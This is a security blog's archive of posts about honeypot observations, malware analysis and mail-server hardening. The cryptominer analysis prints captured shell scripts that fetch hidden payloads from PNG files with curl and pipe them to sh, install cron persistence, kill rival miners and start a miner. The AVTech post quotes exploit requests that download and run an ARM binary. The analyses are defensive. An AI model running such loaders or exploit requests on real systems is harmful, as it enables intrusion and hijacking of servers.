Updating wordlists from Elasticsearch  

Posted at 8:34 am in Uncategorized

Among the many benefits of running a honeypot is gathering the credentials intruders try in order to log in. As explained in some earlier blog posts, my Cowrie honeypots are redirecting secondary connections to another honeypot running INetSim. For example, an intruder logged in to a Cowrie honeypot may use the established foothold to make further attempts towards other services. INetSim regularly logs various attempts to create fake Facebook profiles, log in to various mail accounts, and submit product reviews.

 

Top 15 hostnames that honeypot intruders try to submit data to

 

INetSim activity is obviously tracked as well, which means that login credentials used by Cowrie intruders to gain further access elsewhere will also be stored. I’m logging all honeypot activity to Elasticsearch for easy analysis and for making nice visualizations.

 

Most recent usernames and passwords used by intruders

 

Real passwords are always nice to have for populating wordlists used for e.g. password quality assurance, as dictionary attacks are often more efficient than bruteforcing. For this purpose I’m maintaining a local password list extracted from Elasticsearch. With the recent addition of the SQL interface, this extraction process was easy to script.

 

#!/bin/bash
PASSFILE=/some/path/to/honeypot_passwords.list
TODAY=$(date +%Y.%m.%d)

echo "select \"cowrie.password\" from \"logstash-${TODAY}\" \
 where \"cowrie.password\" is not null;" \
 | /usr/share/elasticsearch/bin/elasticsearch-sql-cli 2>&1 \
 | tail -n +7 | head -n -1 | sort -u \
 | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' \
 | while read p; do
   grep -qax "${p}" ${PASSFILE} || echo "$p" | tee -a ${PASSFILE}
done

echo "select \"password\" from \"logstash-${TODAY}\" \
 WHERE \"service\" IS NOT NULL AND \"password\" IS NOT NULL\
 AND MATCH(tags, 'inetsim');" \
 | /usr/share/elasticsearch/bin/elasticsearch-sql-cli 2>&1 \
 | tail -n +7 | head -n -1 | sort -u \
 | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' \
 | while read p; do
   grep -qax "${p}" ${PASSFILE} || echo "$p" | tee -a ${PASSFILE}
done

 

This script (although with some more pipes and filters) is regularly run by cron, continuously adding more fresh passwords to the local wordlist.

Written by bjorn on November 13th, 2018

Tagged with , , , , , , ,

X-Forwarded-For DDoS  

Posted at 10:55 pm in Uncategorized

A discussion forum of one of Redpill Linpro‘s customers has been under attack lately, through a number of DoS and DDoS variants. Today’s attack strain was of the rather interesting kind, as one of its very distinctive identifiers was a suspicious, not to say ridiculous, amount of IP addresses in the incoming X-Forwarded-For HTTP header. The X-Forwarded-For IP addresses included both IPv4 and IPv6 addresses.

The longest X-F-F header observed contained no less than 20 IP addresses that the HTTP request had allegedly been forwarded through on its way to the forum. If we are to believe the headers, this particular request has been following this route: United States → United States → South Africa → United States → United States → Mexico → Uruguay → China → Germany → United States → United States → South Africa → United States → United States → Mexico → Uruguay → China → Germany → Costa Rica → Norway.

This short animation (click to play) illustrates a few of the the alleged routes:

Whether the HTTP requests have indeed been proxied through all these relays is difficult to confirm. By their reverse DNS lookup, quite a few of the IP addresses identify themselves as proxy servers. Checking a sample of the listed IP addresses did not reveal any open proxies or other kinds of relays, neither were they listed on random open relay blacklists. The HTTP headers included the “Via:” header as well, indicating that the request did pass through some HTTP proxies. But as we know, incoming headers can’t be trusted and should never be treated as if they could.

For the purpose of blocking the DDoS attack, it’s not really interesting whether the intermediate IP addresses are real or just faked. We simply reconfigured Varnish to check each incoming HTTP request for two things:

  • Does the X-Forwarded-For header have more than five IP addresses?
  • Is the request destined for the forum currently under siege?

All requests matching the above criteria were then efficiently rejected with the well-known, all-purpose 418 I’m a teapot HTTP response. After a minute or two of serving 418 responses, the attack stopped abruptly.

Written by bjorn on March 19th, 2018

Tagged with , , , ,

Control code usernames in telnet honeypot  

Posted at 9:19 am in Uncategorized

By running a Cowrie honeypot, I’m gathering interesting information about various kinds of exploits, vulnerabilities, and botnets. Upon a discovery of a new Linux-based vulnerability – often targeting network routers, IoT devices, and lately many IP camera products – the botnets will usually come in waves, testing the new exploits.

The honeypot logs everything the intruders to. In addition to extracting and submitting useful indicators to threat intelligence resources like VirusTotal and AlienVault’s Open Threat Exchange, I’m processing the logs in an Elastic stack for graphing and trending. As shown below, there’s a section of the Kibana dashboard that details activity by time range and geolocation, and I’m also listing the top 10 usernames and passwords used by intruders trying to gain access.

Parts of my Cowrie dashboard in Kibana

Parts of my Cowrie dashboard in Kibana

This morning I briefly checked the top 10 usernames tag cloud when something unusual caught my eye.

KIbana username tag cloud

It wasn’t the UTF rectangle added to the “shell” and the “enable” user names, these are really shell\u0000, enable\u0000, sh\u0000 and are appearing quite frequently nowadays. What caught my eye was this tiny, two-character username, looking like an upside-down version of the astrological sign for Leo and a zigzag arrow.

Weird username from tag cloud

Upon closer inspection, the username is actually \u0014\t\t\u0012 – “Device Control 4”, two TABs, and “Device Control 2”.

One of the passwords used with this username was \u0002\u0003\u0000\u0007\u0013 – visualized in Kibana as follows:

Other passwords from the same IPs also include different control codes, beautifully visualized by Kibana as shown below:

From the Cowrie logs, the first occurrences in my honeynet were 2017-12-16. Exactly what kind of vulnerability these control codes are targeting is not known to me yet, but I am sure we will find out over the next few days.

Written by bjorn on December 21st, 2017

Tagged with , , , , , , , ,

Covert channels: Hiding shell scripts in PNG files  

Posted at 11:15 am in Uncategorized

A colleague made me aware of a JBoss server having been compromised. Upon inspection, one of the processes run by the JBoss user account was this one:

sh -c curl hxxp://img1.imagehousing.com/0/beauty-287196.png -k|dd skip=2446 bs=1|sh

 

This is a rather elegant way of disguising malicious code. If we first take a look at the png file:

$ file beauty-287196.png
beauty-287196.png: PNG image data, 160 x 160, 8-bit colormap, non-interlaced

 

Then, let’s extract its contents like the process shown above does:

$ cat beauty-287196.png | dd skip=2446 bs=1 > beauty-287196.png.sh
656+0 records in
656+0 records out
656 bytes copied, 0,00166122 s, 395 kB/s
$ file beauty-287196.png.sh
beauty-287196.png.sh: ASCII text

 

Lo and behold, we now have a shell script file with the following contents:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh
echo "*/60 * * * * curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/60 * * * * curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh" > /var/spool/cron/crontabs/root
(crontab -l;printf '*/60 * * * * curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh \n')|crontab -
while true
do
        curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh
        sleep 3600
done

 

As we can see, the shell script will try to replace different users’ cron schedules with the contents from a downloaded file. This is the shell script extract from the beauty-036457.png file:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
days=$(($(date +%s) / 60 / 60 / 24))
DoMiner()
{
    curl -kL -o /tmp/11232.jpg hxxp://img1.imagehousing.com/0/art-061574.png
    dd if=/tmp/11232.jpg skip=7664 bs=1 of=/tmp/11231
    curl -kL -o /tmp/11234.jpg hxxp://img1.imagehousing.com/0/pink-086153.png
    dd if=/tmp/11234.jpg skip=10974 bs=1 of=/tmp/11233
    chmod +x /tmp/11231
    nohup /tmp/11231 -c /tmp/11233 &
    sleep 10
    rm -rf /tmp/11234.jpg
    rm -rf /tmp/11233
    rm -rf /tmp/11232.jpg
    rm -rf /tmp/11231
}
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4 
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB 
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df 
pkill -f cpuloadtest 
pkill -f crypto-pool 
pkill -f xmr 
pkill -f prohash 
pkill -f monero 
pkill -f miner
pkill -f nanopool 
pkill -f minergate 
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "11231" || DoMiner

 

The shell script starts by downloading even more resources, then looking for – and killing – competing BitCoin mining processes. Finally, it starts its own BitCoin miner. I’ll describe the downloaded components:

The first file it downloads (art-061574.png) is, after extraction, a binary:

$ file 11231
11231: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

 

The extracted file’s MD5/SHA1/SHA256 hashes are as follows:

483b322b42835227d98f523f9df5c6fc
91e71ca252d1ea759b53f821110d8f0ac11b4bff
28d5f75e289d652061c754079b23ec372da2e8feb1066a3d57381163b614c06c

 

Based on its checksum, the file is a BitCoin miner very well known by Virustotal.

The next file it downloads (pink-086153.png)  is – after extraction – a config file. Its contents are:

{
 "url" : "stratum+tcp://212.129.44.155:80",
 "url" : "stratum+tcp://62.210.29.108:80",
 "url" : "stratum+tcp://212.83.129.195:80",
 "url" : "stratum+tcp://212.129.44.157:80",
 "url" : "stratum+tcp://212.129.46.87:80",
 "url" : "stratum+tcp://212.129.44.156:80",
 "url" : "stratum+tcp://212.129.46.191:80",
 "user" : "[ID]",
 "pass" : "x",
 "algo" : "cryptonight",
 "quiet" : true
}

 

We see that the script executes the first downloaded component (the ELF binary) with the other downloaded component as its config. Since this compromise never obtained root privileges, root’s cron jobs were never impacted.

The interesting about this compromise was not the binaries themselves, nor the fact that the JBoss server was vulnerable – but the covert transport mechanisms. We found no less than four different BitCoin miner binaries in the JBoss account’s home directory, indicating that several bots have been fighting over this server. As an additional bonus, the following entry was found in the JBoss account’s crontab:

*/1 * * * * curl 107.182.21 . 232/_x2|sh

 

The _x2 file contains the following shell script:

AGENT_FILE='/tmp/cpux'
if [ ! -f $AGENT_FILE ]; then
 curl 107.182.21 . 232/cpux > $AGENT_FILE
fi
if [ ! -x $AGENT_FILE ]; then
 chmod +x $AGENT_FILE
fi
ps -ef|grep $AGENT_FILE|grep -v grep
if [ $? -ne 0 ]; then
 nohup $AGENT_FILE -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u [ID] -p x > /dev/null 2>&1 &
fi

 

The cpux file is also thoroughly registered in Virustotal (at the time of writing, 29 antivirus products identify it as malicious). It has the same checksums as the 11231 file described earlier.

 

Written by bjorn on April 21st, 2017

Tagged with , , , ,

Fake LinkedIn invites  

Posted at 10:21 am in Uncategorized

Yet another fake LinkedIn invite landed in my inbox today. Just for the fun of it, I decided to dissect the fake invite.

LinkedIn scam mail

The first thing that caught my attention was the email’s subject: Add Me On LinkedIn. Normally, LinkedIn invite requests appear as polite and humble, this one not so much.

Next was the sender address. LinkedIn has most of their ducks in a row when it comes to email standards compliance, which you should do when you’re a mass mailer, but this one didn’t even care to fake a sender email address. The header registered by my mail server was simply From: Linkedin (just the name, no email) when receiving the message; my mail server’s address has been appended in the final representation.

Then there’s the fact that every clickable item in the email links to a South African site, hxxp://simplystickerz.co.za/, identified as harmful by five different vendors at Virustotal.

The last dead giveaway was the image of the alleged sender. While not visible in the email itself, the email was supposed to include the image from a remote URL in the ggpht.com domain. The domain belongs to Google and is used for serving static images for YouTube and other sites. A quick Google reverse image search revealed that this was no other than Mohammed bin Rashid Al Maktoum, the Vice President of the United Arab Emirates.

Other details include broken or missing images, backgrounds, and buttons. The scammers even made an (unconscious?) effort to link some of them through Google caches/proxies. If at all intentional, it could have been to avoid LinkedIn getting suspicious over multiple unrelated image requests. It’s only too bad that none of the destination URLs exist, causing broken images in the email.

With a few minor improvements, this mail would have the potential to scam even more recipients. At least if we ignore that the mail originated from the babytrend.com domain 🙂

Written by bjorn on April 18th, 2017

Tagged with , , , ,

Yet another Mirai strain targeting AVTech devices  

Posted at 8:21 am in Uncategorized

My Suricata IDS triggered on an HTTP request to my honeypot this morning:

ET WEB_SERVER Suspicious Chmod Usage in URI

 

Further investigation revealed this incoming request:

 POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget%20-O%20/tmp/Arm1%20http://172.247.x.y:85/Arm1;chmod%200777%20/tmp/Arm1;/tmp/Arm1 HTTP/1.1
 Host: [redacted]
 Connection: keep-alive
 Accept-Encoding: gzip, deflate
 Accept: */*
 User-Agent: python-requests/2.13.0
 Content-Length: 0
 Authorization: Basic YWRtaW46YWRtaW4=

 

The request seems to take advantage of a vulnerability in AVTech devices, described here, here and here (and elsewhere).

URL decoding the query string yields the following commands (formatted for readability, and URL redacted to avoid accidental downloads):

wget -O /tmp/Arm1 http://172.247.x.y:85/Arm1
chmod 0777 /tmp/Arm1
/tmp/Arm1

 

In other words, the request will trick the targeted device into downloading a file, changing the file’s permissions, and excute it locally. The Arm1 file identifies as follows:

Arm1: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.14, not stripped

 

The IP address performing the request, 137.59.18.190, belongs to a company in Hong Kong (but registered with Korea Telecom). The IP from which the binary is downloaded, 172.247.116.21, seems to belong to a U.S. cloud provider. At the time of writing, no antivirus provider used by VirusTotal knows anything about the URL or the downloaded file, and the anlyz malware analysis sandbox finds nothing wrong with it. However, judging from the nature of the request I think it’s safe to assume that this is most likely malicious, possibly another Mirai strain or something equivalent.

This blog post will be updated with more details. A full packet capture is available, but since the request only reached my honeypot it won’t be very useful.

 

Update #1: An additional request

I’ve seen additional requests, trying to download the same file but probably through a different vulnerability. This is the request – a GET instead of the previous POST:

GET /cgi-bin/;wget%20-O%20/tmp/Arm1%20http://172.247.a.b:8080/Arm1;chmod%200777/tmp/Arm1;/tmp/Arm1 HTTP/1.1

 

For this request, the requesting IP (137.59.19.132) is registered to the same Hong Kong company and the IP hosting the ARM binary (172.247.116.3) belongs to the same U.S. cloud provider.

 

Update #2: The binary’s content

The ARM binary seems to include some kind of proxy which seems to be named “wake”, including wrapper scripts. Using strings(1), the script excerpts below are found from the binary:

#!/bin/sh
 while true;do
 server=`netstat -nlp | grep :39999`
 if [ ${#server} -eq 0 ] ; then
 nohup %s -c 1 &
sleep 5
done

 

and

#!/bin/sh
### BEGIN INIT INFO
# Provides: wake
# Required-Start: $remote_fs
# Required-Stop: $remote_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start or stop the HTTP Proxy.
### END INIT INFO
case "$1" in
 start)
 nohup /usr/bin/wake -c 1 &
 ;;
 stop)
 ;;
esac

 

Judging from the scripts, the “wake” proxy listens on port 39999. The IP address 192.154.108.2 (GorillaServers, Inc., US) is also seen in the binary.

 

Update #3: Other observations

Some IPs in the same ranges as well as similar download URLs are reported as seen in other peoples’ honeypots as well, along with the ARM binary’s hashes.

 

Update #4: detux

Among other things, analyzing the binary in detux confirms the mentioned IP address, finding it will connect to 192.154.108.2:77. The IP and socket are available and listening but gives no sensible response. Best guess: Command and control station.

Written by bjorn on February 27th, 2017

Tagged with , , , , , ,

Blocking bots from the Cutwail botnet  

Posted at 4:05 pm in Uncategorized

Recently I’ve seen an increase in mail spambots identifying with the EHLO string EHLO ylmf-pc. These belong to (or at least stem from) the Cutwail botnet, originally observed as early as 2007.

The following table shows the number of attempts over the last two weeks. The numbers are not overwhelming for a private mail server, but enough to be found annoying.

Jan 11: 1794
Jan 12:  444
Jan 13:  150
Jan 14:  621
Jan 15:  391
Jan 16:  183
Jan 17:  388
Jan 18:  681
Jan 19:  296
Jan 20:  625
Jan 21:  165
Jan 22: 1242
Jan 23: 2534
Jan 24:  148
Jan 25: 1702

 

Running Postfix, I have of course already established a HELO check that will reject these attempts:

File: /etc/postfix/helo_access

ylmf-pc REJECT

 

The corresponding postconf setting (in italics):

smtpd_helo_restrictions =
 permit_mynetworks
 check_helo_access hash:/etc/postfix/helo_access
 permit

 

However, I’ve also configured postscreen in my Postfix instance. Most of the spambots are rejected by postscreen and thus never reach the mail server. Still, since every spambot will easily make 10 to 15 attempts, and every attempt creates quite a bit of log noise. I’d like to reject them quickly so they’re not polluting my logs, and this is where fail2ban becomes a useful ally. Since there was no available fail2ban filter for postscreen, I wrote one myself, along with the corresponding config/activation file – both suffixed .local so as not to interfere with future upgrades.

File: /etc/fail2ban/filter.d/postscreen.local

[INCLUDES]
before = common.conf

[Definition]
_daemon = postfix/postscreen
failregex = ^%(__prefix_line)sPREGREET \d+ after \d+\.\d+ from \[<HOST>\]:\d+: EHLO ylmf-pc\\r\\n
ignoreregex =

 

File: /etc/fail2ban/jail.local

[postscreen]
port = smtp,465,submission
logpath = %(postfix_log)s
enabled = true
maxretry = 1

 

After restarting fail2ban, the combination of the above files will block every spambot identifying with the characteristic EHLO greeting the first time it makes an attempt.

 

Written by bjorn on January 28th, 2017

Tagged with , , , , , ,

Enabling SNMP support in Amavisd-new  

Posted at 10:13 pm in Uncategorized

If there’s a short and sweet installation document for enabling SNMP support in Amavisd-new, I seem to have failed searching for it today. Instead I made my own, partially for documenting my own setup and partially for the benefit of others.

This brief installation document assumes you’re running a Ubuntu or Debian system. It will also assume that your Amavisd-new service is installed and running as one should expect.

First, install the programs and its dependencies. The Amavisd-new SNMP subagent metrics are available through the regular Net-SNMP software suite. Note: The /etc/default/amavisd-snmp-subagent file says it needs libnet-snmp-perl, but it will also require the libsnmp-perl package.

# apt-get install libnet-snmp-perl libsnmp-perl snmp-mibs-downloader snmp snmpd

 

Then, download all the MIBs you’ll need (and a few more). Due to distribution restrictions Debian-based systems provide a separate downloader which will save the MIBs to where they should be.

# download-mibs

Downloading documents and extracting MIB files.
This will take some minutes.
[...]

 

When the download process has completed, allow the snmp server and the snmp agent to locate and use the MIBs by commenting out or removing the appropriate lines (in italic) in /etc/default/snmpd and /etc/snmp/snmp.conf respectively:

File: /etc/default/snmpd

# This file controls the activity of snmpd

# Don't load any MIBs by default.
# You might comment this lines once you have the MIBs downloaded.
# export MIBS=

 

and

File: /etc/snmp/snmp.conf

# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
# mibs :

 

For MIB support for the Amavisd-new metrics (yes you want this), download the AMAVIS-MIB file into the directory /usr/share/snmp/mibs/:

# wget https://amavis.org/AMAVIS-MIB.txt -O /usr/share/snmp/mibs/AMAVIS-MIB.txt

 

Enable the Amavisd-new SNMP agent by configuring its default setting file:

File: /etc/default/amavisd-snmp-subagent

# To enable the amavis-snmp-subagent set ENABLED to yes

ENABLED="yes"

 

The Amavisd-new SNMP subagent will register a couple of OIDs with SNMPd using the AgentX protocol. Below is parts of the output from a debug run, indicating which OIDs it will register with SNMPd.

NET-SNMP version 5.7.3 AgentX subagent connected
registering root OID 1.3.6.1.4.1.15312.2.1.1 for am.snmp
registering root OID 1.3.6.1.4.1.15312.2.1.2 for am.nanny
registering root OID 1.3.6.1.4.1.15312.2.1.3.1.1 for pf.maildrop
registering root OID 1.3.6.1.4.1.15312.2.1.3.1.2 for pf.incoming
registering root OID 1.3.6.1.4.1.15312.2.1.3.1.3 for pf.active
registering root OID 1.3.6.1.4.1.15312.2.1.3.1.4 for pf.deferred

 

So we will need to tell SNMPd that these should be available. We do that by adding the following line, with an OID base covering all of the above, to /etc/snmp/snmpd.conf:

view systemonly included .1.3.6.1.4.1.15312.2.1

 

Finally, (re)start all the services involved.

# service snmpd restart
# service amavis restart
# service amavisd-snmp-subagent restart

 

After a short while you should be able to read Amavis statistics over SNMP!

# snmpwalk -m +AMAVIS-MIB -c public -v2c 127.0.0.1 1.3.6.1.4.1.15312.2.1
[...]
AMAVIS-MIB::inMsgs.0 = Counter32: 41
AMAVIS-MIB::inMsgsOpenRelay.0 = Counter32: 41
AMAVIS-MIB::inMsgsStatusAccepted.0 = Counter32: 35
AMAVIS-MIB::inMsgsStatusRejected.0 = Counter32: 6
AMAVIS-MIB::inMsgsSize.0 = Counter64: 456221
AMAVIS-MIB::inMsgsSizeOpenRelay.0 = Counter64: 456221
AMAVIS-MIB::inMsgsRecips.0 = Counter32: 41
AMAVIS-MIB::inMsgsRecipsOpenRelay.0 = Counter32: 41
AMAVIS-MIB::inMsgsBounce.0 = Counter32: 9
AMAVIS-MIB::inMsgsBounceNullRPath.0 = Counter32: 2
AMAVIS-MIB::inMsgsBounceUnverifiable.0 = Counter32: 9
AMAVIS-MIB::outMsgs.0 = Counter32: 15
AMAVIS-MIB::outMsgsSubmit.0 = Counter32: 15
AMAVIS-MIB::outMsgsSubmitQuar.0 = Counter32: 9
AMAVIS-MIB::outMsgsSubmitNotif.0 = Counter32: 6
AMAVIS-MIB::outMsgsProtoLocal.0 = Counter32: 9
AMAVIS-MIB::outMsgsProtoLocalSubmit.0 = Counter32: 9
AMAVIS-MIB::outMsgsProtoSMTP.0 = Counter32: 6
AMAVIS-MIB::outMsgsProtoSMTPSubmit.0 = Counter32: 6
AMAVIS-MIB::outMsgsDelivers.0 = Counter32: 15
AMAVIS-MIB::outMsgsSize.0 = Counter64: 87735
AMAVIS-MIB::outMsgsSizeSubmit.0 = Counter64: 87735
AMAVIS-MIB::outMsgsSizeSubmitQuar.0 = Counter64: 87729
AMAVIS-MIB::outMsgsSizeSubmitNotif.0 = Counter64: 6
AMAVIS-MIB::outMsgsSizeProtoLocal.0 = Counter64: 87729
AMAVIS-MIB::outMsgsSizeProtoLocalSubmit.0 = Counter64: 87729
AMAVIS-MIB::outMsgsSizeProtoSMTP.0 = Counter64: 6
AMAVIS-MIB::outMsgsSizeProtoSMTPSubmit.0 = Counter64: 6
AMAVIS-MIB::quarMsgs.0 = Counter32: 9
AMAVIS-MIB::quarBadHdrMsgs.0 = Counter32: 3
AMAVIS-MIB::quarSpamMsgs.0 = Counter32: 6
AMAVIS-MIB::quarMsgsSize.0 = Counter64: 87729
AMAVIS-MIB::quarBadHdrMsgsSize.0 = Counter64: 8273
AMAVIS-MIB::quarSpamMsgsSize.0 = Counter64: 79456
AMAVIS-MIB::contentCleanMsgs.0 = Counter32: 32
AMAVIS-MIB::contentCleanMsgsOpenRelay.0 = Counter32: 32
AMAVIS-MIB::contentBadHdrMsgs.0 = Counter32: 3
AMAVIS-MIB::contentBadHdrMsgsOpenRelay.0 = Counter32: 3
AMAVIS-MIB::contentSpamMsgs.0 = Counter32: 6
AMAVIS-MIB::contentSpamMsgsOpenRelay.0 = Counter32: 6
AMAVIS-MIB::outConnNew.0 = Counter32: 6
[...]

 

You should now be able to throw different kinds of monitoring software on Amavisd-new.

 

Written by bjorn on January 22nd, 2017

Tagged with , , ,

Icinga/Nagios check for Sophos antivirus signature freshness  

Posted at 9:19 pm in Uncategorized

I’ve been running Amavisd-new with scanner components like ClamAV and SpamAssassin on the mail relay for my personal mail for several years. Lately I’ve been thinking that since Amavis supports multiple content scanners I should add another antivirus product. Unfortunately there’s a limited number of free (for home/individual use) antivirus products running on Linux, and quite a few of them are not being maintained, but I found a very promising candidate from Sophos.

Adding Sophos antivirus for Linux to Amavisd-new wasn’t all that difficult (and is covered by other articles elsewhere), but one thing was missing to complete the picture: An automated method for checking whether Sophos is running with updated antivirus signature files. I was hoping to find or write something that could be used with Icinga (or Nagios).

Conveniently, Sophos provides an XML URL containing the file name and md5sum of the latest signature file. Below is the status file at the time of writing:

<?xml version="1.0" encoding="utf-8"?>
<latest><ide>
<name>vawtr-ig.ide</name>
<md5>f6f7cda04be9192f23972a2735fbfaca</md5>
<size>21584</size>
<timestamp>2017-01-18T14:11:00</timestamp>
<published>2017-01-18T17:11:27</published>
</ide></latest>

 

Having found the status file, writing a short script didn’t take long. I’m using xmlstarlet for better readability. The script is stored as /usr/local/bin/check_sophos.

#!/bin/bash

SOPHOSDIR=/opt/sophos-av/lib/sav

/usr/bin/GET https://downloads.sophos.com/downloads/info/latest_IDE.xml | \
/usr/bin/xmlstarlet fo | \
/usr/bin/awk -F \(\<\|\>\) '{print $2" "$3}' | \
while read attribute value; do
  if [ "$attribute" = "name" ]; then
    FILE="$value"
  elif [ "$attribute" = "md5" ]; then
    MD5SUM="$value"
  fi
  if [ "x$FILE" != "x" -a "y$MD5SUM" != "y" ]; then
    if [ ! -e "${SOPHOSDIR}/${FILE}" ]; then
      echo "WARNING: Sophos has not yet downloaded its latest signature file."
      exit 1
    fi
    CHECKSUM=$(/usr/bin/md5sum "${SOPHOSDIR}/${FILE}" | /usr/bin/awk '{ print $1 }')
    if [ "$CHECKSUM" = "$MD5SUM" ]; then
      echo "OK: Newest signature file ${FILE} has the correct checksum ($MD5SUM)"
      exit 0
    else
      echo "WARNING: ${FILE} seems to be outdated."
      exit 1
    fi
    # Cleanup
    FILE=""; MD5SUM="";
  fi
done

 

As those fluent in shell scripting will easily see, the script reads the XML status URL and extracts the file name and md5sum of the most recent antivirus signature file. Then the script checks for the file’s existence, and triggers a warning if the file isn’t there. If the file is present, its md5sum is compared to what should be expected from the XML status URL.

After testing the script I added it to Icinga via NRPE, so now I’ll be getting a notice if something’s wrong with Sophos’ antivirus update.

Written by bjorn on January 18th, 2017

Tagged with , , , , , , , , ,

How to produce AfterGlow diagrams from Cowrie  

Posted at 9:34 am in Uncategorized

I’ve been receiving a few questions on how to produce the AfterGlow diagrams from Cowrie logs, described in an earlier blog post. Instead of repeating myself through email requests, an explanation here will be better.

First of all, you will need to decide what you want to visualize. Showing the different attackers targeting a Cowrie honeypot has limited value (and can be visualized with something much simpler than AfterGlow). Showing the next steps of the intruders, however, is a job well suited for AfterGlow.

Based on the intruders’ behaviour in Cowrie, where a few intruders use a limited number of ports to try to connect to multiple target IPs, the CSV input to AfterGlow should reflect this, so we’ll need the following format:

source_IP,dest_port,dest_IP

 

Below is a Cowrie log line showing that the intruder from IP 5.45.87.184 attempts to contact the target IP 216.58.210.36 on port 443 (formatted for readability):

2017-01-16 15:32:30+0100 [SSHService ssh-connection on
HoneyPotSSHTransport,9704,5.45.87.184] direct-tcp connection
request to 216.58.210.36:443 from localhost:5556

 

To convert this into CSV that AfterGlow will accept, I wrote a short parser script. This can be done in most languages, I used Perl:

#!/usr/bin/perl

use strict;
use warnings;

while (<>) {
 if ($_ =~ /HoneyPotSSHTransport,\d+,(.*?)\].* to (.*?):(\d+) /) {
  print "$1,$3,$2\n"
 }
}

 

The Perl code was saved as /usr/local/bin/cowrie2csv.pl on the host running Cowrie.

Since I’m creating the graphs on a different server that where Cowrie is running, I wrote a bash wrapper to tie it all together. Note the quotes that separate what’s run locally and what’s run on the Cowrie server.

#!/bin/bash

MYDATE=$(date +%Y-%m-%d)
if [ "$1" = "yesterday" ]; then
 MYDATE=$(date +%Y-%m-%d -d yesterday)
fi

ssh honeypot "grep '${MYDATE}.*direct-tcp connection request' \
 /home/cowrie/log/cowrie.log* | \
 /usr/local/bin/cowrie2csv.pl" | \
 /usr/local/bin/afterglow.pl \
 -c /usr/local/etc/afterglow/color.properties | \
 /usr/bin/neato -T png > \
 /var/www/html/cowrie-afterglow-${MYDATE}.png

 

The color.properties file contains my AfterGlow preferences for this kind of diagrams, and contains the following:

color.source="red"
color.edge="lightgrey"
color.event="lightblue"
color.target="yellow"

maxnodesize=1;
size.source=$sourceCount{$sourceName};
size.event=$eventCount{$eventName};
size.target=$targetCount{$targetName};
size=0.2
